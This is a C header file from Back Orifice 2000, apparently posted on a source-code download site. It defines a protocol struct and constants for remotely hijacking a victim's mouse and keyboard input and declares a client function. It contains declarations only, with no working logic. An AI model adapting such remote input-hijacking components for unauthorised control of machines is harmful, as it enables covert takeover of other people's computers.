hiclient.h
上传用户:jinandeyu
上传日期:2007-01-05
资源大小:620k
文件大小:2k
源码类别:

远程控制编程

开发平台:

WINDOWS

  1. /*  Back Orifice 2000 - Remote Administration Suite
  2.     Copyright (C) 1999, Cult Of The Dead Cow
  3.     This program is free software; you can redistribute it and/or modify
  4.     it under the terms of the GNU General Public License as published by
  5.     the Free Software Foundation; either version 2 of the License, or
  6.     (at your option) any later version.
  7.     This program is distributed in the hope that it will be useful,
  8.     but WITHOUT ANY WARRANTY; without even the implied warranty of
  9.     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  10.     GNU General Public License for more details.
  11.     You should have received a copy of the GNU General Public License
  12.     along with this program; if not, write to the Free Software
  13.     Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
  14. The author of this program may be contacted at dildog@l0pht.com. */
  15. #ifndef __INC_CMD_HICLIENT_H
  16. #define __INC_CMD_HICLIENT_H
  17. #include<windows.h>
  18. #pragma pack(push,1)
  19. #pragma warning(disable:4200)
  20. typedef struct {
  21. BYTE bAction;
  22. BYTE bDevice;
  23. union {
  24. struct {
  25. WORD wPosX;
  26. WORD wPosY;
  27. } mouse;
  28. struct {
  29. BYTE bVirtKey;
  30. BYTE bScanCode;
  31. DWORD dwKeyFlags;
  32. } keybd;
  33. struct {
  34. DWORD dwDataLen;
  35. } message;
  36. };
  37. } HIJACK_HEADER;
  38. #define HA_MOVE         1
  39. #define HA_LBUTTONDOWN  2
  40. #define HA_LBUTTONUP    3
  41. #define HA_MBUTTONDOWN  4
  42. #define HA_MBUTTONUP    5
  43. #define HA_RBUTTONDOWN  6
  44. #define HA_RBUTTONUP    7
  45. #define HA_LBUTTONDBL   8
  46. #define HA_MBUTTONDBL   9
  47. #define HA_RBUTTONDBL   10
  48. #define HA_KEYDOWN      11
  49. #define HA_KEYUP        12
  50. #define HA_OWNDEVICE    13
  51. #define HA_FREEDEVICE   14
  52. #define HA_MESSAGE      15
  53. #define HA_SUCCESS      16
  54. #define HA_FAILURE      17
  55. #define HBF_LBUTTON 1
  56. #define HBF_MBUTTON 2
  57. #define HBF_RBUTTON 4
  58. #define HD_KEYBD      0
  59. #define HD_MOUSE      1
  60. #pragma pack(pop)
  61. int CreateHijackClient(HWND hParent);
  62. #endif